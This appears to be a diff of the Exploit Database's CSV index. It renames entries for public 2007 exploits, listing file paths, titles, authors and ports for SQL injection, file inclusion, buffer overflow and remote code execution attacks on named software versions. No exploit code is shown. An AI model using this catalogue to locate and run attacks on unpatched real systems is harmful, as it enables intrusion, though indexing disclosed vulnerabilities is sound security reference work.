id,file,description,date,author,platform,type,port 4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,aix,local,0 4233,platforms/aix/local/4233.c,"IBM AIX 5.3 sp6 - ftp gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0 4234,platforms/windows/remote/4234.html,"mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server - Data Write/Code Execution",2007-07-27,callAX,windows,remote,0 -4235,platforms/php/webapps/4235.txt,"Seditio CMS 121 - 'pfs.php' Remote File Upload",2007-07-27,A.D.T,php,webapps,0 +4235,platforms/php/webapps/4235.txt,"Seditio CMS 121 - 'pfs.php' Arbitrary File Upload",2007-07-27,A.D.T,php,webapps,0 4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0 -4237,platforms/windows/remote/4237.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Command Execution Exploit",2007-07-27,h07,windows,remote,0 +4237,platforms/windows/remote/4237.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Command Execution",2007-07-27,h07,windows,remote,0 4238,platforms/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0 4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 - (comments_get.asp id) SQL Injection",2007-07-28,g00ns,asp,webapps,0 4240,platforms/windows/remote/4240.html,"VMware IntraProcessLogging.dll 5.5.3.42958 - Arbitrary Data Write Exploit",2007-07-28,callAX,windows,remote,0 @@ -3897,7 +3898,7 @@ id,file,description,date,author,platform,type,port 4246,platforms/php/webapps/4246.txt,"wolioCMS - Authentication Bypass / SQL Injection",2007-07-30,k1tk4t,php,webapps,0 4247,platforms/windows/remote/4247.c,"Borland Interbase 2007 SP1 - Create-Request Remote Overflow",2007-07-30,BackBone,windows,remote,3050 4248,platforms/php/webapps/4248.txt,"Joomla Component com_gmaps 1.00 - (mapId) SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0 -4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash Exploit",2007-07-31,tenkei_ev,multiple,dos,0 +4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash",2007-07-31,tenkei_ev,multiple,dos,0 4250,platforms/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 - GetComponentVersion() Remote Overflow",2007-07-31,lhoang8500,windows,remote,0 4251,platforms/windows/dos/4251.html,"Microsoft Internet Explorer 6 - DirectX Media Remote Overflow Denial of Service",2007-07-31,DeltahackingTEAM,windows,dos,0 4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow",2007-08-01,n00b,windows,local,0 @@ -3918,7 +3919,7 @@ id,file,description,date,author,platform,type,port 4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - (format_menue) Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4269,platforms/php/webapps/4269.txt,"FrontAccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 -4270,platforms/windows/local/4270.php,"PHP mSQL (msql_connect) - Local Buffer Overflow Exploit",2007-08-08,Inphex,windows,local,0 +4270,platforms/windows/local/4270.php,"PHP mSQL (msql_connect) - Local Buffer Overflow",2007-08-08,Inphex,windows,local,0 4271,platforms/php/webapps/4271.txt,"FishCart 3.2 RC2 - (fc_example.php) Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0 4272,platforms/windows/dos/4272.c,"Cisco IOS Next Hop Resolution Protocol (NHRP) - Denial of Service",2007-08-09,"Martin Kluge",windows,dos,0 4273,platforms/php/webapps/4273.txt,"Ncaster 1.7.2 - (archive.php) Remote File Inclusion",2007-08-09,k1n9k0ng,php,webapps,0 @@ -3934,20 +3935,20 @@ id,file,description,date,author,platform,type,port 4283,platforms/windows/remote/4283.pl,"Racer 0.5.3 Beta 5 - Remote Buffer Overflow",2007-08-13,n00b,windows,remote,26000 4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script - 'category.php cat' SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 4285,platforms/windows/dos/4285.c,"CounterPath X-Lite 3.x - SIP phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos,0 -4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Login Bypass SQL Injection",2007-08-14,s4squatch,cgi,webapps,0 -4287,platforms/windows/remote/4287.py,"Surgemail 38k - (SEARCH) Remote Buffer Overflow",2007-08-14,"Joey Mengele",windows,remote,143 +4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Login Bypass (SQL Injection)",2007-08-14,s4squatch,cgi,webapps,0 +4287,platforms/windows/remote/4287.py,"Surgemail 38k - 'Search' Remote Buffer Overflow",2007-08-14,"Joey Mengele",windows,remote,143 4288,platforms/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,windows,dos,0 4289,platforms/windows/dos/4289.php,"Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos,0 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php query' SQL Injection",2007-08-16,RoXur777,php,webapps,0 -4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure Exploit",2007-08-17,Pravus,windows,remote,0 +4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0 4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows/x86) - (PHP_win32sti) Local Buffer Overflow (PoC)",2007-08-18,boecke,windows,dos,0 4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Pre-Authentication Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0 4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0 -4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 -4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 -4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - (uacomx.ocx 2.0.1) Remote Buffer Overflow Exploit",2007-08-21,rgod,windows,remote,0 +4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 +4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 +4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - (uacomx.ocx 2.0.1) Remote Buffer Overflow",2007-08-21,rgod,windows,remote,0 4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - (category_id) SQL Injection",2007-08-21,k1tk4t,php,webapps,0 4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 - SMTPD CRAM-MD5 Pre-Authentication Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25 4302,platforms/windows/local/4302.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (1)",2007-08-22,Inphex,windows,local,0 @@ -3961,7 +3962,7 @@ id,file,description,date,author,platform,type,port 4310,platforms/php/webapps/4310.txt,"Joomla Component BibTeX 1.3 - Blind SQL Injection",2007-08-23,ajann,php,webapps,0 4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit",2007-08-23,NetJackal,windows,local,0 4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21 -4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - (search) Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0 +4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0 4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Pre-Authentication Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Pre-Authentication EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 @@ -3983,15 +3984,15 @@ id,file,description,date,author,platform,type,port 4332,platforms/php/webapps/4332.txt,"VWar 1.5.0 R15 - (mvcw.php) Remote File Inclusion",2007-08-28,DNX,php,webapps,0 4333,platforms/php/webapps/4333.txt,"PHPNuke-Clan 4.2.0 - (mvcw_conver.php) Remote File Inclusion",2007-08-28,DNX,php,webapps,0 4334,platforms/windows/remote/4334.txt,"MSN messenger 7.x (8.0?) - Video Remote Heap Overflow",2007-08-29,wushi,windows,remote,0 -4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - (webcam) Remote Crash Exploit",2007-08-29,wushi,windows,dos,0 +4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - (webcam) Remote Crash",2007-08-29,wushi,windows,dos,0 4336,platforms/php/webapps/4336.txt,"xGB 2.0 - (xGB.php) Remote Security Bypass",2007-08-29,DarkFuneral,php,webapps,0 4337,platforms/windows/dos/4337.c,"Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0 4338,platforms/php/webapps/4338.pl,"ABC estore 3.0 - 'cat_id' Blind SQL Injection",2007-08-29,k1tk4t,php,webapps,0 4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 - (shownews.php id) SQL Injection",2007-08-29,SmOk3,php,webapps,0 4340,platforms/php/webapps/4340.txt,"phpBG 0.9.1 - (rootdir) Remote File Inclusion",2007-08-29,GoLd_M,php,webapps,0 -4341,platforms/php/webapps/4341.txt,"Pakupaku CMS 0.4 - Remote File Upload / Local File Inclusion",2007-08-29,GoLd_M,php,webapps,0 +4341,platforms/php/webapps/4341.txt,"Pakupaku CMS 0.4 - Arbitrary File Upload / Local File Inclusion",2007-08-29,GoLd_M,php,webapps,0 4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - 'id' SQL Injection",2007-08-30,"not sec group",php,webapps,0 -4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - (uploadmedia.cgi) Remote File Upload",2007-08-30,Don,cgi,webapps,0 +4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - (uploadmedia.cgi) Arbitrary File Upload",2007-08-30,Don,cgi,webapps,0 4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Pre-Authentication Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0 4345,platforms/windows/local/4345.c,"Norman Virus Control - nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0 4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0 @@ -3999,18 +4000,18 @@ id,file,description,date,author,platform,type,port 4348,platforms/windows/remote/4348.c,"PPStream - (PowerPlayer.dll 2.0.1.3829) ActiveX Remote Overflow",2007-08-31,dummy,windows,remote,0 4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection",2007-08-31,k1tk4t,php,webapps,0 4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection",2007-09-01,Silentz,php,webapps,0 -4351,platforms/windows/remote/4351.html,"Yahoo! Messenger - (YVerInfo.dll 2007.8.27.1) ActiveX Buffer Overflow Exploit",2007-09-01,minhbq,windows,remote,0 +4351,platforms/windows/remote/4351.html,"Yahoo! Messenger - (YVerInfo.dll 2007.8.27.1) ActiveX Buffer Overflow",2007-09-01,minhbq,windows,remote,0 4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion",2007-09-02,bius,php,webapps,0 4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) SQL Injection",2007-09-02,k1tk4t,php,webapps,0 4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local,0 4355,platforms/windows/local/4355.php,"OtsTurntables 1.00 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local,0 4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - 'index.php' Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0 -4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote registry key manipulation Exploit",2007-09-03,rgod,windows,remote,0 +4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote registry key Manipulation Exploit",2007-09-03,rgod,windows,remote,0 4358,platforms/php/webapps/4358.txt,"STPHPLibrary - (STPHPLIB_DIR) Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0 4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow (PoC)",2007-09-03,"David Vaartjes",multiple,dos,0 4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)",2007-09-03,"Patrick Webster",windows,remote,0 4361,platforms/windows/local/4361.pl,"Microsoft Visual Basic 6.0 - VBP_Open OLE Local CodeExec Exploit",2007-09-04,Koshi,windows,local,0 -4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Traversal Exploit",2007-09-04,Katatafish,linux,remote,0 +4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Traversal",2007-09-04,Katatafish,linux,remote,0 4363,platforms/php/webapps/4363.txt,"PHPOF 20040226 - (DB_adodb.class.php) Remote File Inclusion",2007-09-04,"ThE TiGeR",php,webapps,0 4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0 4365,platforms/php/webapps/4365.txt,"AnyInventory 2.0 - (Environment.php) Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps,0 @@ -4031,13 +4032,13 @@ id,file,description,date,author,platform,type,port 4380,platforms/php/webapps/4380.txt,"Sisfo Kampus 2006 - (blanko.preview.php) Local File Disclosure",2007-09-08,QTRinux,php,webapps,0 4381,platforms/php/webapps/4381.txt,"Txx CMS 0.2 - Multiple Remote File Inclusion",2007-09-08,"Nice Name Crew",php,webapps,0 4382,platforms/php/webapps/4382.txt,"PHPress 0.2.0 - (adisplay.php lang) Local File Inclusion",2007-09-08,"Nice Name Crew",php,webapps,0 -4383,platforms/php/webapps/4383.txt,"Joomla Component Restaurante - Remote File Upload",2007-09-08,"Cold Zero",php,webapps,0 +4383,platforms/php/webapps/4383.txt,"Joomla Component Restaurante - Arbitrary File Upload",2007-09-08,"Cold Zero",php,webapps,0 4384,platforms/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusion",2007-09-08,MhZ91,php,webapps,0 4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple SQL Injections",2007-09-09,k1tk4t,php,webapps,0 4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php f' Remote File Download",2007-09-10,k-one,php,webapps,0 4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - (MGR) Multiple Remote File Inclusion",2007-09-10,QTRinux,php,webapps,0 4388,platforms/windows/remote/4388.html,"Ultra Crypto Component - (CryptoX.dll 2.0) SaveToFile() Insecure Method",2007-09-10,shinnai,windows,remote,0 -4389,platforms/windows/remote/4389.html,"Ultra Crypto Component - (CryptoX.dll 2.0) Remote Buffer Overflow Exploit",2007-09-10,shinnai,windows,remote,0 +4389,platforms/windows/remote/4389.html,"Ultra Crypto Component - (CryptoX.dll 2.0) Remote Buffer Overflow",2007-09-10,shinnai,windows,remote,0 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / Local File Inclusion",2007-09-10,k1tk4t,php,webapps,0 4391,platforms/multiple/remote/4391.c,"Lighttpd 1.4.16 - FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0 4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 @@ -4046,7 +4047,7 @@ id,file,description,date,author,platform,type,port 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0 4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 <= 2.2.2 Plugin - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0 -4398,platforms/windows/remote/4398.html,"Microsoft SQL Server - Distributed Management Objects Buffer Overflow Exploit",2007-09-12,96sysim,windows,remote,0 +4398,platforms/windows/remote/4398.html,"Microsoft SQL Server - Distributed Management Objects Buffer Overflow",2007-09-12,96sysim,windows,remote,0 4399,platforms/multiple/remote/4399.html,"Apple QuickTime (Multiple Browsers) - Command Execution (PoC)",2007-09-12,pdp,multiple,remote,0 4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection",2007-09-13,Houssamix,php,webapps,0 4401,platforms/php/webapps/4401.txt,"Joomla Component joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0 @@ -4066,7 +4067,7 @@ id,file,description,date,author,platform,type,port 4416,platforms/php/webapps/4416.txt,"joomla Component joom12pic 1.0 - Remote File Inclusion",2007-09-16,Morgan,php,webapps,0 4417,platforms/php/webapps/4417.txt,"SimpCMS - (keyword) SQL Injection",2007-09-16,"Cold Zero",php,webapps,0 4418,platforms/php/webapps/4418.sh,"Omnistar Article Manager Software - 'article.php' SQL Injection",2007-09-16,"Cold Zero",php,webapps,0 -4419,platforms/php/webapps/4419.php,"Shop-Script FREE 2.0 - Remote Command Execution Exploit",2007-09-17,InATeam,php,webapps,0 +4419,platforms/php/webapps/4419.php,"Shop-Script FREE 2.0 - Remote Command Execution",2007-09-17,InATeam,php,webapps,0 4420,platforms/windows/remote/4420.html,"MW6 Technologies QRCode ActiveX 3.0 - Remote File Overwrite",2007-09-18,shinnai,windows,remote,0 4421,platforms/php/webapps/4421.txt,"phpsyncml 0.1.2 - Remote File Inclusion",2007-09-18,S.W.A.T.,php,webapps,0 4422,platforms/php/webapps/4422.txt,"KwsPHP 1.0 sondages Module - SQL Injection",2007-09-18,Houssamix,php,webapps,0 @@ -4083,7 +4084,7 @@ id,file,description,date,author,platform,type,port 4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) SQL Injection",2007-09-19,str0ke,php,webapps,0 4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0 -4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure Exploit",2007-09-20,undefined1_,php,webapps,0 +4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure",2007-09-20,undefined1_,php,webapps,0 4437,platforms/linux/remote/4437.c,"Lighttpd 1.4.17 - FastCGI Header Overflow Remote Exploit",2007-09-20,Andi,linux,remote,80 4438,platforms/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x - Remote Heap Overflow",2007-09-21,axis,windows,remote,25 4439,platforms/php/webapps/4439.txt,"neuron news 1.0 - (index.php q) Local File Inclusion",2007-09-21,Dj7xpl,php,webapps,0 @@ -4092,12 +4093,12 @@ id,file,description,date,author,platform,type,port 4442,platforms/php/webapps/4442.txt,"CMS Made Simple 1.2 - Remote Code Execution",2007-09-21,irk4z,php,webapps,0 4443,platforms/php/webapps/4443.txt,"ClanSphere 2007.4 - 'cat_id' SQL Injection",2007-09-22,IHTeam,php,webapps,0 4444,platforms/php/webapps/4444.txt,"Black Lily 2007 - 'products.php class' SQL Injection",2007-09-22,VerY-SecReT,php,webapps,0 -4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object - (emprint.dll 6.0.1.0) Buffer Overflow Exploit",2007-09-23,rgod,windows,remote,0 +4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object - (emprint.dll 6.0.1.0) Buffer Overflow",2007-09-23,rgod,windows,remote,0 4446,platforms/php/webapps/4446.txt,"Wordsmith 1.1b - (config.inc.php _path) Remote File Inclusion",2007-09-23,ShockShadow,php,webapps,0 4447,platforms/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion",2007-09-23,"BorN To K!LL",php,webapps,0 4448,platforms/php/webapps/4448.txt,"helplink 0.1.0 - (show.php) Remote File Inclusion",2007-09-23,GoLd_M,php,webapps,0 4449,platforms/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - SQL Injection",2007-09-23,IHTeam,php,webapps,0 -4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - (If-Modified-Since) Remote Buffer Overflow Exploit",2007-09-24,h07,windows,remote,80 +4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - (If-Modified-Since) Remote Buffer Overflow",2007-09-24,h07,windows,remote,80 4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusion",2007-09-24,BiNgZa,php,webapps,0 4452,platforms/windows/remote/4452.html,"AskJeeves Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow",2007-09-24,"Joey Mengele",windows,remote,0 4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd - (EBCRYPT.dll 2.0) Multiple Remote Vulnerabilities",2007-09-24,shinnai,windows,remote,0 @@ -4113,7 +4114,7 @@ id,file,description,date,author,platform,type,port 4463,platforms/php/webapps/4463.txt,"Integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0 4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0 4465,platforms/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0 -4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - upload_files.php Arbitrary File Upload Exploit",2007-09-28,InATeam,php,webapps,0 +4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - upload_files.php Arbitrary File Upload",2007-09-28,InATeam,php,webapps,0 4467,platforms/php/webapps/4467.pl,"MDPro 1.0.76 - SQL Injection",2007-09-29,undefined1_,php,webapps,0 4468,platforms/windows/remote/4468.html,"Tor < 0.1.2.16 - ControlPort Remote Rewrite Exploit",2007-09-29,elgCrew,windows,remote,0 4469,platforms/php/webapps/4469.txt,"Mambo Component Mambads 1.5 - SQL Injection",2007-09-29,Sniper456,php,webapps,0 @@ -4125,7 +4126,7 @@ id,file,description,date,author,platform,type,port 4475,platforms/php/webapps/4475.php,"PHP-Fusion module Expanded Calendar 2.x - SQL Injection",2007-10-01,Matrix86,php,webapps,0 4476,platforms/php/webapps/4476.txt,"Segue CMS 1.8.4 - 'index.php' Remote File Inclusion",2007-10-01,kezzap66345,php,webapps,0 4477,platforms/php/webapps/4477.txt,"PHP wcms XT 0.0.7 - Multiple Remote File Inclusion",2007-10-01,kezzap66345,php,webapps,0 -4478,platforms/linux/remote/4478.c,"smbftpd 0.96 - SMBDirList-function Remote Format String Exploit",2007-10-01,"Jerry Illikainen",linux,remote,21 +4478,platforms/linux/remote/4478.c,"smbftpd 0.96 - SMBDirList-function Remote Format String",2007-10-01,"Jerry Illikainen",linux,remote,21 4479,platforms/windows/dos/4479.html,"CyberLink PowerDVD - CreateNewFile Arbitrary Remote Rewrite Denial of Service",2007-10-01,rgod,windows,dos,0 4480,platforms/php/webapps/4480.pl,"MultiCart 1.0 - Blind SQL Injection",2007-10-02,k1tk4t,php,webapps,0 4481,platforms/php/webapps/4481.txt,"Poppawid 2.7 - (form) Remote File Inclusion",2007-10-02,0in,php,webapps,0 @@ -4161,9 +4162,9 @@ id,file,description,date,author,platform,type,port 4511,platforms/php/webapps/4511.pl,"cpDynaLinks 1.02 - category.php SQL Injection",2007-10-10,ka0x,php,webapps,0 4512,platforms/php/webapps/4512.txt,"nuseo PHP enterprise 1.6 - Remote File Inclusion",2007-10-10,BiNgZa,php,webapps,0 4513,platforms/php/webapps/4513.php,"PHP-Stats 0.1.9.2 - Multiple Vulnerabilities",2007-10-10,EgiX,php,webapps,0 -4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow Exploit",2007-10-10,bangus/magnum,linux,remote,0 -4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure Exploit",2007-09-01,qaaz,solaris,local,0 -4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure Exploit",2007-10-10,qaaz,solaris,local,0 +4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,linux,remote,0 +4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,solaris,local,0 +4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,solaris,local,0 4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0 4518,platforms/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - client.php Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 @@ -4172,13 +4173,13 @@ id,file,description,date,author,platform,type,port 4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0 4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 - Newsletter Module SQL Injection",2007-10-11,s4mi,php,webapps,0 4524,platforms/php/webapps/4524.txt,"joomla Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0 -4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0 +4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - tiki-graph_formula.php Command Execution",2007-10-12,str0ke,php,webapps,0 4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script - SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0 4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module - SQL Injection",2007-10-13,"Mehmet Ince",php,webapps,0 4529,platforms/cgi/webapps/4529.txt,"WWWISIS 7.1 - (IsisScript) Local File Disclosure / Cross-Site Scripting",2007-10-13,JosS,cgi,webapps,0 -4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0 -4531,platforms/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local SEH Overwrite",2007-10-14,h07,windows,local,0 +4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure",2007-10-14,eliteboy,multiple,remote,0 +4531,platforms/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,windows,local,0 4532,platforms/linux/dos/4532.pl,"eXtremail 2.1.1 - memmove() Remote Denial of Service",2007-10-15,mu-b,linux,dos,0 4533,platforms/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,linux,remote,4501 4534,platforms/linux/remote/4534.c,"eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow",2007-10-15,mu-b,linux,remote,143 @@ -4189,7 +4190,7 @@ id,file,description,date,author,platform,type,port 4539,platforms/php/webapps/4539.txt,"Okul Otomasyon Portal 2.0 - SQL Injection",2007-10-16,dumenci,php,webapps,0 4540,platforms/multiple/dos/4540.pl,"GCALDaemon 1.0-beta13 - Remote Denial of Service",2007-10-16,ikki,multiple,dos,0 4541,platforms/linux/remote/4541.c,"Half-Life Server 3.1.1.0 - Remote Buffer Overflow",2005-10-16,greuff,linux,remote,27015 